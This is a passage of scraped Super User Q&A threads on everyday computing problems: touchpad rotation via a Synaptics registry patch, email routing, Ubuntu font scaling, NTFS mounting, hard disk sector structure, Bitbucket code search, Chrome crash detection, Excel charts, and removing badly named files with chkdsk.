3 For Synaptics (and some derived) touchpads and pointing sticks, a bit ofdigging through the registry turned up persistent, per-user, axis rotationangles and a per-system, auto-rotation control.Applying the following patch, either immediately before loggingout (and back in) logging out reverts the axes and leaves them so.Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\SOFTWARE\Synaptics\SynTP\StickPS2]"MotionRotationAngle"=dword:00000000[HKEY_CURRENT_USER\SOFTWARE\Synaptics\SynTP\TouchPadPS2]"MotionRotationAngle"=dword:00000000[HKEY_LOCAL_MACHINE\SOFTWARE\Synaptics\SynTPEnh]"AutoRotationFlag"=dword:00000000Applying the patch either between killing and restarting 'SynTpEnh.exe' (peruser) or just before entering or leaving the touchpad control panel may alsowork (less disruptively), but remains untested.As always, save the original values before applying the patch--especiallythe autorotation flag, which is OEM dependent and not documented in theSynaptics reference driver release notes.ShareImprove this answer Follow answered May 19, 2017 at 14:50Eric RoesingerEric Roesinger3144 bronze badges3Copied from my 29 April answer to [64629[[]superuser.com/questions/624629/], which was marked duplicate 30 April. Replaces a previous answer downvoted (perhaps appropriately) for only referring to the other post. – Eric RoesingerMay 19, 2017 at 14:56Ordinarily, I would have preferred simply to edit the other answer, but the retained down-vote count would have been deceptive: it reflected my having previously supplied a reference in lieu of this content (which, for the OP's apparent purposes, produces more useful results than other answers presented here. – Eric RoesingerMay 19, 2017 at 15:15Mine were in a slightly different spot (Computer\HKEY_CURRENT_USER\Software\Synaptics\SynTP\TouchPadSMB2cTM3145-3 ), but searching the registry for those key names found them all. You should be able to stop the service SynTPEnh Caller Service, kill the SynTpEnh.exe process, and then restart the service. – detlyAug 14, 2018 at 6:23Add a comment | ; 1 User smc in the comments above suggested kiilling the SynTPEnh.exe [Synaptec pointing driver] to fix the mouse issues. While this works, it also breaks all TouchPad and UltraNav features. I searched my drive for another copy and it turns out there was a version from 2010 on there. Launched that and I got my scrolling back even with a vertical monitor!If you plan on using a vertical monitor setup on a regular basis with Synaptec hardware, see if downgrading the driver is a viable option.Another note: This issue only seems to come up when the primary monitor is in portrait mode. If you don't want to downgrade, see if you can run your primary monitor horizontally and your secondary/tertiary/etc. monitor(s) vertically. ShareImprove this answer Follow answered Apr 17, 2015 at 16:50ndm13ndm1312188 bronze badges1Thanks for the ideas, but the primary monitor (where the taskbar is and where the applications appear) "must" be portrait one. Unfortunately I cannot test your idea about downgrading because I don't have the hardware anymore. – NotinlistApr 17, 2015 at 18:48Add a comment | ; 0 Windows is rotating the display using the video-card graphics software.Unfortunately, that solution doesn’t rotate anything else, meaning that your touchpad is still configured for standard, landscape usage. So, if you rotate your desktop on a laptop, the touchpad will not rotate with the screen, which makes the touchpad somewhat difficult to use.As Microsoft doesn't supply a solution, one needs to use third-party products.The best recommended product I could find is EeeRotate, last updated in 2008,but might still work for you :Ctrl+Alt+Right: rotate screen and touchpad by 270 degreesCtrl+Alt+Up: back to normalA similar product is ScreenMouseRotate, last updated in 20010.(I have no personal experience with both products.)ShareImprove this answer Follow answered Oct 19, 2014 at 14:31harrymcharrymc429k2929 gold badges492492 silver badges872872 bronze badges4"doesn't rotate anything else": false. The mouse works correctly on both screens (monitor and laptop). The touch-pad works rotated 90 degree clockwise on both screens. Both products you mention are abandonware, so I'm not allowed install them. – NotinlistOct 23, 2014 at 14:001And also EeeRotate seems to rotate both monitors, while I want to rotate only one. – NotinlistOct 23, 2014 at 14:04I'm using some excellent utilities that haven't been updated for years, but still work fine. I don't know of a product that rotates the touchpad as a function of the active monitor, but you could use the keyboard shortcuts to rotate/unrotate when needed. Not optimal, I agree. – harrymcOct 23, 2014 at 15:53Another remark: It is possible to write an AutoHotkey macro that does what you want, to exchange the x,y coordinates of the mouse, and only when the active window is on the right monitor. This thread could get you started. – harrymcOct 23, 2014 at 18:49Add a comment | 
How does email routing work?
email;dns;routing;smtp;email;dns;routing;smtp
How does email routing work? Ask Question
5 What you're missing is that nmap isn't the be-all-end-all checker of open ports.For one, it's a terrible idea to do a full-on port scan just to see if one single port is open. telnet works perfectly fine:shadur@huginn:~$ telnet gmail-smtp-in.l.google.com. 25 Trying 2a00:1450:4013:c01::1b...Connected to gmail-smtp-in.l.google.com.Escape character is '^]'.Mark makes one very good possible explanation in the comment to your question; another possibility is that google's mail server, which almost certainly is under near-constant low-grade attacks from opportunists, notices the port scan attempt and promptly blocks your IP address for the next five minutes before you've gotten as far as port 22, let alone 25. That said, the full flow diagram is a little larger:You compose the message in your mail client, whatever it may be (called a Mail User Agent, or MUA).The MUA consults its settings and the To: field to see how this should be handled, then calls on the appropriate outgoing mail server (MTA - Mail Transfer Agent) that its configuration tells it has been tasked to handle this. On unix systems, this is normally localhost; windows systems tend to configure their ISP's outgoing mail server. The MTA that receives the message from the MUA checks its configuration and matches it against the message's source, destination (and optionally body) to decide what should be done with it. Depending on the aforementioned this can vary from rejecting it outright to scanning it for viruses/spam/etc or sending it on.If the MTA determines that the message should be accepted, but the recipient's domain is not in its list of domains to be handled locally, it will attempt to relay the message, either to the recipient domain's MX or a configured so-called "smart host". (Most unix systems mentioned in #3 have their localhost smtp server configured to use their ISP's mail server for outgoing mail). The "smart host" will then pick this up at step 3.Once an MTA in the link has decided to send it directly to the recipient, it will first attempt to send it to the primary MX. If that MX doesn't respond, it'll attempt the rest of the MX servers in order of descending priority until it gets an explicit accept or reject response from one or until it runs out of MX records to try, whichever comes first.Once an MTA in the recipient domain's MX records receives the message, it will likewise consult its configuration and match it against the message headers and contents to determine what to do with it, with the same repertoire of options as mentioned under #3, but with the added option to "deliver to end user" via the configured Mail Delivery Agent (MDA).When the MDA receives the message, it too consults its configuration to decide how the message should be handled and what mailbox (if any) the message should be dropped into.ShareImprove this answer Follow answered Oct 15, 2014 at 8:35ShadurShadur2,33222 gold badges1313 silver badges1818 bronze badges2I tried poling all MX in the priority-order. Port 25 is closed on all MXs. Even I can't do telnet also. So Mark's observation may be correct. – user2586432Oct 15, 2014 at 8:54Yeah, @mark's suggestion was the most common explanation. – ShadurOct 15, 2014 at 8:58Add a comment | 
Ubuntu system font too small
ubuntu;ubuntu-14.04;ubuntu;ubuntu-14.04
Ubuntu system font too small Ask Question
2 To solve this problem, go to Applications->Settings->Appearance then goto DPI and uncheck or turn off "Custom DPI setting". Evidently, something causes that to activate during a [faulty] update.ShareImprove this answer Follow answered May 8, 2016 at 23:41user591789user5917892122 bronze badgesAdd a comment | ; 1 I had this exact same problem on my machine. I went into Universal Access in system settings and switched "Large Text" on, then back off. After turning it off, the text went back to it's normal size and all was well.ShareImprove this answer Follow edited Jan 26, 2015 at 18:27Enigma3,3011010 gold badges4848 silver badges7272 bronze badges answered Jan 26, 2015 at 17:13anon123anon1231111 bronze badge3This answer is a repeat of the information in Erik's answer. The only value it adds is to confirm that another solution worked, so it isn't really an answer. This kind of information can be posted as a comment when you accumulate a little more rep. – fixer1234Jan 26, 2015 at 18:07@fixer1234 no, actually, this answer is exactly what I've been forced to do on ubuntu 20.04 after some weird update... It is not equal to erik's answer because it says "switched 'Large Text' on, then back off", and he doesnt say that! What he says here is a USEFUL TRICK on a buggy feature. So again, we have to turn it on (large text) and revert it to it's original/default state (normal text = OFF), and this is a quite useful trick because we should not be required to do that, never! – Aquarius PowerOct 5, 2020 at 23:46but I am using this now: askubuntu.com/a/1269402/46437 – Aquarius PowerOct 6, 2020 at 0:05Add a comment | ; 0 You can try Gnome Tweak Tool:https://apps.ubuntu.com/cat/applications/gnome-tweak-tool/It's kinda buggy but gets the job done.There's also an option called "Large Text" in System Settings > Universal Access .ShareImprove this answer Follow answered Oct 15, 2014 at 17:42ErikErik101Add a comment | ; 0 Unity Tweak Tool, in the Ubuntu App Store. I know, it really should be part of the base install.See this https://askubuntu.com/a/59920/201083ShareImprove this answer Follow edited Apr 13, 2017 at 12:22CommunityBot1 answered Jan 24, 2015 at 22:12kervinkervin10122 bronze badges1Please quote the essential parts of the answer from the reference link(s), as the answer can become invalid if the linked page(s) change. – DavidPostill♦ Jan 24, 2015 at 22:45Add a comment | ; 0 I believe you are referring to small size of everything including cursor, in that case following worked for me!!!Go to System Settings -> Display.Change the resolution according to your choice.ShareImprove this answer Follow answered Apr 3, 2016 at 22:17YouGotITYouGotIT1Add a comment | ; 0 I had this problem, and all I had to do was go to the unity tweak tool and change the "text scaling factor" in the fonts setting.ShareImprove this answer Follow answered May 11, 2017 at 18:58BrettBrett10Add a comment | 
Why is the mounting of an NTFS partition in Linux not functioning properly?
linux;mount;ntfs;linux;mount;ntfs
Why is the mounting of an NTFS partition in Linux not functioning properly? Ask Question
0 It appears that I stumbled across my own answer, or at least most of it.It was obvious that mounting was taking place and the contents of the fstab entry and the mount command were different, so that looked like a good place to start. The fstab was pre-existing, possibly created when I ran ntfs-config. I guessed that the different mount points might be the problem (the partition was being mounted, just not where everything was looking for it). I changed that in fstab and now the partition is found.The only remaining question is about the other main difference between the two specifications. fstab lists the filesystem as ntfs-3g, which appears to be a correct description. From what I see in the definition of that filesystem, one of its characteristics deals with permissions. The mount command includes a umask parameter that is missing from the fstab entry. I understand that it defines permissions, but I don't understand how to decode it. So it isn't clear whether the defaults used by the ntfs-3g entry are the same as the umask value in the mount command, or they might be different but the ntfs-3g defaults are "good enough". I didn't want to create a possible conflict by adding the umask parameter to the fstab entry. If anyone can clarify that, it would be much appreciated.ShareImprove this answer Follow edited Oct 15, 2014 at 16:15Giacomo196851.5k1818 gold badges161161 silver badges205205 bronze badges answered Oct 15, 2014 at 16:01fixer1234fixer123426.7k6161 gold badges7171 silver badges115115 bronze badgesAdd a comment | 
What do you call the area on a hard disk smaller than a sector?
hard-drive;hard-drive
What do you call the area on a hard disk smaller than a sector? Ask Question
25 I believe the term you're looking for is "magnetic domain", "a region within a magnetic material which has uniform magnetization" (wp). Hard drive designers are always trying to reduce the size of the magnetic domains. But. First, "channel codes" are used: The 0s and 1s recorded on the drive are not the same as the 0s and 1s you write and will eventually read. Sawdust is correct about how 1s and 0s are recorded, but there's more: The drive recovers clock pulses (so it can know where to expect a flux reversal, if there is one) from the flux polarity reversals, but cannot do so from stretches where there are no reversals. This can be a problem. It's entirely plausible that someone might write an entire sector - 4096 bits with 512-byte sectors - of all 0s! Which would (if recorded simply) have no flux reversals. Due to irregularities in rotation speed, among other things, the drive would likely "lose its place" long before the end of that sector. So the data to be written is actually expanded into somewhat more bits, using a channel code that ensures there will never be more than some number of non-flux-reversals written in a row. I don't have a reference for the channel codes used in modern hard drives, but you can get a sense for how it works by looking up the "eight to fourteen modulation" ("EFM") that's used on CDs. Under EFM, each group of eight bits (which have 256 possible combinations of 0s and 1s) gets converted to a sequence of 14 bits (16384 combinations, but only 256 of them are valid codes). The sequences within each 14-bit code are chosen so that there are never more than a few - I think it's three - non-flux-reversals (0s) in a row. They're also chosen so as to reduce the bandwidth of the signal. Sounds bizarre, but it's true: By recording more bits you can get away with fewer flux transitions. For example, eight bits of all 1's would require eight flux reversals without a channel code, but instead can be recorded as 14 bits with far fewer than eight flux reversals. Now, think about the very first bit written to a sector. Let's assume it's a 0. Where is it? Thanks to the channel code, the first bit actually written to the sector might well be a 1! Incidentally, talking about CDs is not as off-point as it might seem. CDs use a similar scheme to that described by sawdust: The beginning or end of a "pit" marks a 1, a place where a pit could begin or end, but does not, is a 0. Just like flux reversals. Then there's error correction. Error correction involves additional data stored with each sector. In the past the drive would read the primary data field + the ECC data of the sector, and if any errors were detected (for example, by reading one of the many "should not exist" channel codes), it would use the ECC data to correct the errors. No more. Modern data densities are such that errors are more or less expected. So the ECC mechanisms were strengthened so that far more of the errors are correctable. Yes, this does mean you have to record more bits, but it's a net win in terms of capacity. The result, though, is that we can't really say that an individual bit, even a bit of a channel code, is recorded in a specific location, because the ECC data is as vital to recovering the bit as the channel code. And the way ECC works, the "influence" of each bit on the ECC data is spread over many, many bits of the ECC data. (This principle is called "diffusion.") So, where's the bit? Well, it's sort of spread around. Change one bit in the input and there will be changes in the flux reversals in many places in the sector. If that seems strange, wait until you learn about PRML, which stands for "probable response maximum likelihood": even the waveform recovered from the head, in which the drive looks for flux reversals, is interpreted statistically. But that doesn't have much to do with "where the bits are". ShareImprove this answer Follow edited Oct 16, 2014 at 22:16 answered Oct 15, 2014 at 10:41Jamie HanrahanJamie Hanrahan22.8k66 gold badges6161 silver badges9292 bronze badgesAdd a comment | ; 10 I'm talking about the spot that stores 1 bit of data, the tiny little area that stores either a 1 or a 0 magneticallyTechnically the magnetic particles do not store "either a 1 or a 0". That is simply nontechnical folklore to dumb-down the concept of magnetic storage. It's flux reversal that determines bit value, with the requirement that reading begins in the gap consisting of zeros. See this answer for more on digital magnetic recording techniques.platters, which are doughnut shaped, highly polished disks."Doughnut" is not the correct adjective to use. "Doughnut" is synonymous with torus, and neither have any flat surfaces.Each platter has a series of tracks going around it,Tracks are concentric circles on the surface(s) of the platters.The concept of cylinders needs to be mentioned.This means that each physical sector on the hard drive has 4096 transistor like “areas" that can be either magnetised or not magnetised.This is an inaccurate description. The magnetic recording is not like a "transistor" (e.g. a switch). The magnetic coating of the platter surfaces cannot be "not magnetised".Any area that is magnetised represents a binary 1 and any area that is not magnetised represents a binary 0This is inaccurate. The magnetized particles are polarized in either of two directions to create flux reversals to determine bit states. No flux change indicates the same bit state as the prior bit. A flux change indicates that the bit is the inverse of the prior bit.what do you call the "area" on a hard disk that makes up the sector?The "sector* is actually composed of an ID record and a data record.The data record typically consists of a leading sync byte, the payload data bytes, and the ECC bytes.On some types of HDDs, such as the old, floor-standing Storage Module Drive (SMD), the removable disk pack used a prerecorded servo surface to provide the bit timing and cylinder/track positioning. This prerecorded timing signal was derived by reading the dibits on this surface.From a SMD reference manual (for the CDC BJ4A1 and BJ4A2):Dibit is a shortened term for dipole bit. Dibits are prerecorded on the servo surface during manufacture of the disk pack. Do not confuse the the servo surface with the pack recording surfaces.Dibits are the result of the manner in which flux reversals are recorded on the servo tracks. One type of track, known as the Even track, contains negative dibits. The other type of track, the Odd track, contains positive dibits.But dibits are not the name you are looking for.The most appropriate term that I could find is cell, as in:The length of time required to define one bit of information is the cell.Note that this definition refers to time rather than magnetic particles.ShareImprove this answer Follow edited Jun 12, 2020 at 13:48CommunityBot1 answered Oct 15, 2014 at 9:42sawdustsawdust16.9k11 gold badge3333 silver badges4646 bronze badges9Out of curiosity, at what level do flux states get turned into "0" meaning "no flux reversal" and "1" meaning "flux reversal", as opposed to indicating the last flux state? If there is exactly one flux reversal and it happens just as a bit is being clocked, what guarantees that exactly one bit will be read as "set"? – supercatOct 15, 2014 at 17:081See my answer about channel codes. The channel codes (along with the sector preamble) are designed so that the polarity reversals happen at a fairly constant rate regardless of what the original data was; you'll never have just one flux reversal. – Jamie HanrahanOct 15, 2014 at 19:03@supercat the data is self-clocking, there isn't such an issue. A series of bits gets turned into a series of reversals. Each reversal is constrained to lie within a minimum and a maximum number of clocks of its neighbors. The variations within that range allow the data to be decoded, but the constraints allow the clock to be recovered. – hobbsOct 16, 2014 at 5:39@supercat (that accurately describes RLL codes, which are actually out of date for hard drives, but I don't have good information on the coding techniques used with PRML. They still have to guarantee enough transitions for clock recovery somehow.) – hobbsOct 16, 2014 at 5:43Wow, such a hostile, unfriendly answer. – GremlinOct 16, 2014 at 13:17 | Show 4 more comments; 7 I have worked for disk manufacturers and dealt with the hardware plus firmware that reads, writes, and formats the data. There is no name for anything smaller than a sector. However, a sector does not need to be 512 bytes. I have worked on systems that had sectors that ranged from 64 to 8192 bytes.As others have mentioned, it would really help to know the audience. The OP's proposed explanation is wrong in many ways. I'd want to know the audience before proposing an explanation. For what it's worth, the Wikipedia article for disk sector, https://en.wikipedia.org/wiki/Disk_sector, has a reasonable lay-person's explanation.Something that's missing from the Wikipedia article on disk sectors is coverage of the parts of a sector. Most disks are what we call soft sectored disks. Unfortunately, "Soft sector" redirects to the floppy disk article. They have an article on hard sectoring (https://en.wikipedia.org/wiki/Hard_sectoring) though it's incomplete as older hard disk drives also were hard sectored. Rather than holes in the media they used either small magnets mounted on the spindle, or a part of the spindle that stuck out a fraction of an inch and had holes much like the holes on a hard sector floppy diskette, or dedicated one platter surface that was pre-recorded in the factory with sector and clock marks. Hard sectoring simplified the logic needed to figure out when you could start reading or writing data.Hard disks manufactured since the early 1980s are soft sectored. Soft sectors have the following components:Preamble - this is a special sequence of bits that whose pattern never appears in data.Header - this contains the sector and track numbers. In some of the disks I worked on we also recorded the head number here too.Sync - this is a special pattern much like the preamble. It exists becauseIt takes a finite amount of time to inspect the header data to see if this is the sector we want to read or write.It takes a finite amount of time to switch the head from read mode (to read the header) to write mode (to write disk data). The speed of rotation is not constant ask the disk gets older, it gets hotter or colder, or the power supply voltages change.Data - The data starts immediately after the sync pattern. When writing a sector we read the header and then write the sync and data. When reading we read the sync and using that can detect the start of the data. There are many ways to record the data. Non-return-to-zero (see Wikipedia) is a common method. Early disks used longitudinal magnetic recording (LMR) (see Wikipedia), while modern disks use Perpendicular Magnetic Recording (PMR) (see Wikipedia)Following the data are Cyclic redundancy check (CRC) (older disks) or Error Checking and Correcting (ECC) (newer disks) code bits.Following the CRC/ECC is the leadout pattern. This is much like the sync pattern and is so that the disk controller knows it's hit the end of the data. If it reads the leadout sooner or later than expected then the controller knows there was a glitch in the process.There is a bit of padding after the leadout. Nothing is written here. It exists in case the disk was spinning slightly faster than normal at the time a sector was written. We don't want to overwrite the following sector's Preamble, much less its header, sync, or data.So, getting back to the OP's question, while there is no name for things smaller than a sector there's still quite a bit there.Some of the disks I have worked on do sector blocking and deblocking. For example, we could be using 1024 byte sectors on a particular zone of the media (see Zone bit recording (ZBR) on Wikipedia) but the outside world only sees 512 byte sectors. Essentially, for each zone we use the most efficient on-disk sector size. I use the terms "sector size" and "internal sector size" meaning that while at times we dealt with things smaller than a sector they were still called sectors.ShareImprove this answer Follow answered Oct 16, 2014 at 0:23user3347790user334779039322 silver badges55 bronze badges12And incidentally, channel codes are how the drive can distinguish between data and things like the preamble and the leadout pattern. If the end-user data was simply written to the surface then there would be a possibility that any bit sequence picked for the preamble or leadout might be in the data someone intended to write, thereby "fooling" the drive. With channel coding, though, this possibility disappears, because the bit sequence in the preamble and leadout don't ever appear in valid channel codes. – Jamie HanrahanOct 16, 2014 at 1:34Add a comment | ; 1 ollimpia, I would replace the latter part of your explanation with:"can store 512 bytes that each have eight bits. This means that each physical sector on the hard drive holds 4096 bits of data. The platters are coated with a special material that can both reliably retain a magnetic polarity and allows the polarity to easily be changed. The data is stored using combinations of north-to-south and south-to-north magnetic polarity."I deliberately did not provide a name such as "spot" or "area" for the bits on the media. Neither word is wrong but they are not a perfect fit either. I also deliberately did not spell out the translation of 4096 data bits into the polarized "spots" on the media.The reason I'm avoiding words such as "spot" or "area" is that when reading the data we don't read the magnetic polarity but rather sense the shift from one polarity to another. Thus we are looking for either a "shift" or "no-shift" to know if we are dealing with a 0 or 1 bit. The reason I avoided saying there is a one-to-one translation between data bits and what is written on the disk media is that we can't go for too long with "no-shift" as we might loose track of where we are. We use the shifts to stay in sync. A disk drive translates sequences of data bits into slightly longer sequences of bits that are used on the physical media. The sequences used on the media are designed so that we never go too long with "no-shift" regardless of what the user data contains.Group Code Recording (GCR) is a common method for encoding the data can be explained as using five bits on the media to record each four bits of data. That's not a perfect explanation as the disk is looking at the shifts in polarity and not the bits. If you look at the tables on https://en.wikipedia.org/wiki/Group_code_recording you will see sequences of zeroes and ones. A zero "no-shift" and a one is "shift." The four data bits "0111" could be encoded as "10111". We read "10111" from left to right and when writing this to the media we will polarize the media as:1) north-to-south (shift or no-shift depends on the last bit of the previous nybble)2) north-to-south (no-shift compared to the previous bit)3) south-to-north (shift compared to the previous bit)4) north-to-south (shift compared to the previous bit)5) south-to-north (shift compared to the previous bit)Earlier I explained the parts of the sector with the preamble, sync, etc. The preamble, sync, etc. are recorded using shift patterns that do not exist in the GCR translation tables. Usually they are longs strings of shifts or no-shifts. For example, 6250 GCR RLL will never have more than seven shifts in a row meaning our special patterns can be eight or more shifts in a row. 6250 GCR RLL will also never have more than two no-shifts in a row meaning we can use three or more no-shifts as special pattern that will never exist in recorded user data.As technology improves we are able to have longer runs of "no-shift." This has lead to encoding systems that are more efficient than four data bits encoded as five on-disk bits. The extra efficiency has been used to both increase the available storage but also to add error checking and correcting (ECC).Other technology improvements are to take advantage of that can tell a south-to-north shift apart from a north-to-south shift and "analog recording" in that they are able to vary the intensity of the polarity as a way to squeeze extra information onto the media.Thus, while the disk in a Macbook Pro appears to be a digital storage device engineers that design read/write heads and the coating applied to disk platters are working with analog signals.If you are interested in math then look up "finite field arithmetic" and "abstract algebra" both of which are used in designing what are known as channel coding systems.Rather than "doughnut shaped" I would say that the disk platters look like CD or DVD discs made from metal or other hard materials. Blank platters ready to be installed in a disk have a hole in the middle just like what you see on a CD or DVD.ShareImprove this answer Follow edited Jan 12, 2015 at 21:12 answered Jan 12, 2015 at 21:07user3347790user334779039322 silver badges55 bronze badgesAdd a comment | ; 0 Its an interesting question however from my knowledge this does not have a name except maybe for the material properties of the actual platter itself.However if you did want to break the information down further you could explain that you have a Geometric Sector and a Data Sector;A Geometric Sector is 'pie-slice' section of the platter A Data Sector, AKA a block, is a sub-division of a track. It refers to the inter-section of a track and a geometric sector. Each sector stores a fixed amount of data. -- This is more what your explanation is about rather than the Geometric Sector.Hope this helps. Edit: As per the comment below please see http://en.wikipedia.org/wiki/Disk_sector Also to note Geometrical (or Geometric) sector is not exclusive to Hard Drives lots of things can have a Geometric Sector its just a good way to separate if you are talking about the Whole Sector or the Data Sector.ShareImprove this answer Follow edited Oct 15, 2014 at 10:04 answered Oct 15, 2014 at 8:31CharlesHCharlesH2,14333 gold badges1414 silver badges1818 bronze badges7Please provide a reference that indicates that these terms ("Geometric" and "Data" sectors) are used professionally as you have defined them. – sawdustOct 15, 2014 at 9:47@sawdust added a page to Wiki which was first to come up when I googles :) I actually know this information from a book I studied called mastering IOPS – CharlesHOct 15, 2014 at 10:04Just realized they call the Data Sector a Track Sector, guess its 'one of those' computer terminologies that have multiple names.... – CharlesHOct 15, 2014 at 10:061If it calls a shape a "doughnut", any detail is too technical. – JDługoszOct 16, 2014 at 2:051@jdlugosz lol!! – CharlesHOct 16, 2014 at 7:19 | Show 2 more comments
What triggers dropbox on fedora to upload files?
linux;bash;fedora;dropbox;linux;bash;fedora;dropbox
What triggers dropbox on fedora to upload files? Ask Question
Search for text in all files in Atlassian Stash
api;api
Search for text in all files in Atlassian Stash Ask Question
2 Code search is now a built-in feature of Bitbucket Server (formerly called Stash). This was added in 2016. See https://blog.bitbucket.org/2016/03/24/introducing-code-search-for-bitbucket-server/.ShareImprove this answer Follow answered Feb 13, 2017 at 21:48Jon OnstottJon Onstott24833 silver badges99 bronze badgesAdd a comment | ; 2 There is no such functionality in Stash itself (as discussed in the Atlassian bugtracker at STASH-2851), but there is a third-party plugin in the marketplace and on GitHub: https://github.com/palantir/stash-codesearch-pluginIt does, however, require an ElasticSearch node running alongside and doesn't seem to be trivially installable.ShareImprove this answer Follow answered Dec 11, 2014 at 16:38jstarekjstarek95866 silver badges2121 bronze badgesAdd a comment | ; 0 There's a paid easier version to install on the marketplace currently:https://marketplace.atlassian.com/plugins/com.mohamicorp.stash.search-for-stash/server/overviewShareImprove this answer Follow answered Feb 29, 2016 at 1:34James RicheJames Riche11Could you possibly expand your answer to include some basic instructions on how to use this software? – BurgiMar 28, 2016 at 20:14Add a comment | 
How to put "My Documents" folder link in main menu in Windows 7?
windows-7;start-menu;windows-7;start-menu
How to put "My Documents" folder link in main menu in Windows 7? Ask Question
0 If you navigate to My Documents you should then be able to simply drag and drop the folder on to the quick menu on the left of the Windows Explorer view.ShareImprove this answer Follow answered Oct 15, 2014 at 7:57Samuel NicholsonSamuel Nicholson1,46422 gold badges1313 silver badges2626 bronze badgesAdd a comment | 
How does Google chrome identify that it was not closed properly last time?
google-chrome;google-chrome
How does Google chrome identify that it was not closed properly last time? Ask Question
0 Within the folder "%localappdata%\Google\Chrome\User Data\Default" there is a file called 'Current Session' to my knowledge this holds the information from the session you have open and clears itself when a 'safe' Chrome close is initialized. If Chrome does not close safely then it does not clear this file and then knows what was open from your previous session.ShareImprove this answer Follow answered Oct 15, 2014 at 7:48CharlesHCharlesH2,14333 gold badges1414 silver badges1818 bronze badgesAdd a comment | 
Plot two time series with same start and end time: data does not align with axis
microsoft-excel;microsoft-excel-2010;microsoft-excel-2007;charts;axis;microsoft-excel;microsoft-excel-2010;microsoft-excel-2007;charts;axis
Plot two time series with same start and end time: data does not align with axis Ask Question
1 As indicated in the comments, this was being plotted as a line graph. With a line graph, the X values can be treated as categories rather than a continuous variable. Categories don't have a scale, the axis values are just a series of display positions with labels. In this case, two independent series were plotted on the same axis. Excel doesn't match up category labels for the two data series. The temperature readings had fewer values so they just went into the first positions for as many categories as were needed. The solution is to use an XY graph, where X is always a continuous variable.ShareImprove this answer Follow answered Oct 23, 2014 at 6:13fixer1234fixer123426.7k6161 gold badges7171 silver badges115115 bronze badgesAdd a comment | 
How to force Windows to rename a file with a special character?
windows;rename;filenames;special-characters;windows;rename;filenames;special-characters
How to force Windows to rename a file with a special character? Ask Question
43 Grab a linux live-cd and use that.ShareImprove this answer Follow answered Aug 28, 2009 at 22:11 community wiki salmonmoose 11From home I use linux anyway... and the file is on a portable hard drive, I was just wondering if Windows could handle it... something like an <b>Sudo</b> windows command or something – codeLesAug 28, 2009 at 23:53This is a wildcard issue, not a permission issue. Under linux just about everything is a valid character in a filename (including linebreaks) under Windows, there's a set of reserved characters, and no effective way to escape them. – salmonmooseAug 29, 2009 at 10:194recent linux distros like ubuntu successfully support the most important features of NTFS. – AtmocreationsAug 30, 2009 at 19:311Ubuntu 9.04 is absolutely flawless at NTFS support, with one or two annoyances (like if there's a power cut, and you boot into ubuntu to save a few seconds boot time, you can't access your windows partition until you boot back into it) – PhoshiSep 2, 2009 at 16:591@Pacerier in theory, you possibly could, but it would mean you're mounting the drive in multiple operating systems concurrently, which is generally a bad idea. Shut down, and boot up in the new operating system. – salmonmooseApr 3, 2017 at 0:49 | Show 6 more comments; 28 Have you tried using the short filenames version of its name? Egren whereh~1.ogg where.oggIf it's the only file in the current folder that starts with the first few letters, then use the first 6 letters of the name (ignoring spaces) followed by a tilde (~) then a 1.ShareImprove this answer Follow edited Aug 31, 2009 at 21:23 community wiki 2 revsGAThrawn313Since generation of short names is optional depending on how Windows is currently configured, Murphy says that the OP has short names turned off and the file won't have one. To learn the short name if it is present for any file, use DIR/X which will add a column showing the short name for any file where it differs from the long name, if it has one at all. If there is a short name, this would be a plausible answer. – RBerteigAug 28, 2009 at 22:18You really should give this a try... Short filenames can sometimes be useful. – alexAug 29, 2009 at 10:384no short names, tried your example and also the dir/x proves that there aren't any listed. – codeLesSep 2, 2009 at 15:33Add a comment | ; 24 In Windows 7: Run cmd.exe in Administator Mode.cd into the Directory with the filenames.run: chkdsk /V /f [My bad files were on another drive other than the OS drive, so it was able to dismount it. If it is the OS drive, it may have to do this stage at startup.]Wait (May have to reboot).As you will see the result was that chkdsk actually deleted the files for me. So, if you want to keep the files, I don't know what to do, but this will get rid of the files for sure.Results/Cmd Log:E:\islag\Music\llb>dir Volume in drive E is FreeAgent Drive Volume Serial Number is 5038-892A Directory of E:\islag\Music\llb02/02/2011 12:18 PM <DIR>.02/02/2011 12:18 PM <DIR>..04/04/2010 02:19 PM 4,014,099 01 Los Lonely Boys - Se?orita - www.file24ever.com.mp304/04/2010 02:18 PM 3,125,942 12 Los Lonely Boys - La Contestaci?n - www.file24ever.com.mp32 File(s) 7,140,041 bytes2 Dir(s) 87,743,991,808 bytes freeE:\islag\Music\llb>chkdsk /VThe type of the file system is NTFS.Volume label is FreeAgent Drive.WARNING! F parameter not specified.Running CHKDSK in read-only mode.CHKDSK is verifying files (stage 1 of 3)... 231424 file records processed.File verification completed. 34 large file records processed. 0 bad file records processed. 0 EA records processed. 0 reparse records processed.CHKDSK is verifying indexes (stage 2 of 3)...18 percent complete. (29338 of 245164 index entries processed)An invalid filename 01 Los Lonely Boys - Se?orita - www.file24ever.com.mp3 (31966) was found in directory 31962.All filenames for File 31966 are invalid.Minor file name errors were detected in file 31966.An invalid filename 12 Los Lonely Boys - La Contestaci?n - www.file24ever.com.mp3 (31973) was found in directory 31962.All filenames for File 31973 are invalid.Minor file name errors were detected in file 31973.73 percent complete. (233817 of 245164 index entries processed)Index entry 01 Los Lonely Boys - Se?orita - www.file24ever.com.mp3 in index $I30 of file 31962 is incorrect.Index entry 12 Los Lonely Boys - La Contestaci?n - www.file24ever.com.mp3 in index $I30 of file 31962 is incorrect. 245164 index entries processed.Index verification completed.Errors found. CHKDSK cannot continue in read-only mode.E:\islag\Music\llb>dir Volume in drive E is FreeAgent Drive Volume Serial Number is 5038-892A Directory of E:\islag\Music\llb02/02/2011 12:18 PM <DIR>.02/02/2011 12:18 PM <DIR>..04/04/2010 02:19 PM 4,014,099 01 Los Lonely Boys - Se?orita - www.file24ever.com.mp304/04/2010 02:18 PM 3,125,942 12 Los Lonely Boys - La Contestaci?n - www.file24ever.com.mp32 File(s) 7,140,041 bytes2 Dir(s) 87,743,991,808 bytes freeE:\islag\Music\llb>chkdsk /V /fThe type of the file system is NTFS.Cannot lock current drive.Chkdsk cannot run because the volume is in use by anotherprocess. Chkdsk may run if this volume is dismounted first.ALL OPENED HANDLES TO THIS VOLUME WOULD THEN BE INVALID.Would you like to force a dismount on this volume? (Y/N) yVolume dismounted. All opened handles to this volume are now invalid.Volume label is FreeAgent Drive.CHKDSK is verifying files (stage 1 of 3)... 231424 file records processed.File verification completed. 32 large file records processed. 0 bad file records processed. 0 EA records processed. 0 reparse records processed.CHKDSK is verifying indexes (stage 2 of 3)...18 percent complete. (29339 of 245164 index entries processed)Deleted invalid filename 01 Los Lonely 